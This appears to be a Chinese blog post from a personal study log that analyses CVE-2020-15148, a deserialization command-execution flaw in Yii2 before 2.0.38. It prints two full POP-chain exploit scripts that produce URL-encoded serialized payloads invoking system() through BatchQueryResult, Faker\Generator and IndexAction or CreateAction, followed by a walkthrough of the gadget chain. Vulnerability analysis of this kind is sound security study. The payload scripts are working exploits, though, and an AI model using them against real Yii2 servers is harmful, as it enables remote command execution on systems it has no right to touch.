[PHP代码审计][CVE-2020-15148]Yii2<2.0.38反序列化命令执行

文章目录

  • 写在前面
  • POP链1
  • POP链2
  • 分析

写在前面

最近倒是不知道干些啥,有点迷茫的状态,不过每天都保持学习就好了,今天空下来了准备写一篇刚学的POP链分析

POP链1


namespace yii\db;
class BatchQueryResult extends \yii\base\BaseObject{
     
    private $_dataReader;
    public function __construct()
    {
     
        $this->_dataReader=new \Faker\Generator();
    }
}
namespace yii\base;
class BaseObject{
     
}
namespace yii\rest;
class Action{
     

    public $checkAccess='system';
    public $id='ls';
}
class IndexAction extends Action{
     
}
namespace Faker;
class Generator{
     
    protected $formatters = array();
    public function __construct()
    {
     
        $this->formatters['close']=[(new \yii\rest\IndexAction()),"run"];
    }
}
use \yii\db\BatchQueryResult;
$c=new BatchQueryResult();
print(urlencode(serialize($c)));

POP链2

差不多的换了个地方罢了


namespace yii\db;
class BatchQueryResult extends \yii\base\BaseObject{
     
    private $_dataReader;
    public function __construct()
    {
     
        $this->_dataReader=new \Faker\Generator();
    }
}
namespace yii\base;
class BaseObject{
     
}
namespace yii\rest;
class Action{
     

    public $checkAccess='system';
    public $id='ls';
}
class CreateAction extends Action{
     
}
namespace Faker;
class Generator{
     
    protected $formatters = array();
    public function __construct()
    {
     
        $this->formatters['close']=[(new \yii\rest\CreateAction()),"run"];
    }
}
use \yii\db\BatchQueryResult;
$c=new BatchQueryResult();
print(urlencode(serialize($c)));

分析

我们看提交记录里面有说道
[PHP代码审计][CVE-2020-15148]Yii2<2.0.38反序列化命令执行_第1张图片
是这一条https://github.com/yiisoft/yii2/commit/9abccb96d7c5ddb569f92d1a748f50ee9b3e2b99?branch=9abccb96d7c5ddb569f92d1a748f50ee9b3e2b99&diff=split
[PHP代码审计][CVE-2020-15148]Yii2<2.0.38反序列化命令执行_第2张图片
这也就是说最新版里已经通过__wakeup来禁用了BatchQueryResult类的反序列化
[PHP代码审计][CVE-2020-15148]Yii2<2.0.38反序列化命令执行_第3张图片
这也就是我们的入口点,我们开始分析,调用了$this->reset();
[PHP代码审计][CVE-2020-15148]Yii2<2.0.38反序列化命令执行_第4张图片
通过赋值我们可以实现,调用__call方法
[PHP代码审计][CVE-2020-15148]Yii2<2.0.38反序列化命令执行_第5张图片
这里发现有很多
[PHP代码审计][CVE-2020-15148]Yii2<2.0.38反序列化命令执行_第6张图片
这里我们锁定src/Faker/Generator.php
[PHP代码审计][CVE-2020-15148]Yii2<2.0.38反序列化命令执行_第7张图片
我们得注意根据close方法调用,·$attributes值为空,跟踪
[PHP代码审计][CVE-2020-15148]Yii2<2.0.38反序列化命令执行_第8张图片
看看getFormatter函数
[PHP代码审计][CVE-2020-15148]Yii2<2.0.38反序列化命令执行_第9张图片
个人认为构造也很容易,如下

$this->formatters['close']=["xxxxx"];

注意$arguments为空,是从yii\db\BatchQueryResult::reset()里传过来的,参数不可控,所以我们只能去寻找不带参数地去调用别的类中的方法。全局搜索call_user_func\(\$this->([a-zA-Z0-9]+), \$this->([a-zA-Z0-9]+)

发现这里有两个符合条件的yii\rest\CreateAction::run()yii\rest\IndexAction::run(),其实这两个利用方法一模一样
[PHP代码审计][CVE-2020-15148]Yii2<2.0.38反序列化命令执行_第10张图片
看了下其他类也没法利用,我们以CreateAction为例,能看到这里直接是无过滤的,接下来干嘛不解释了
[PHP代码审计][CVE-2020-15148]Yii2<2.0.38反序列化命令执行_第11张图片
分析完毕

你可能感兴趣的:(#,PHP代码审计,#,训练打卡日记,安全学习)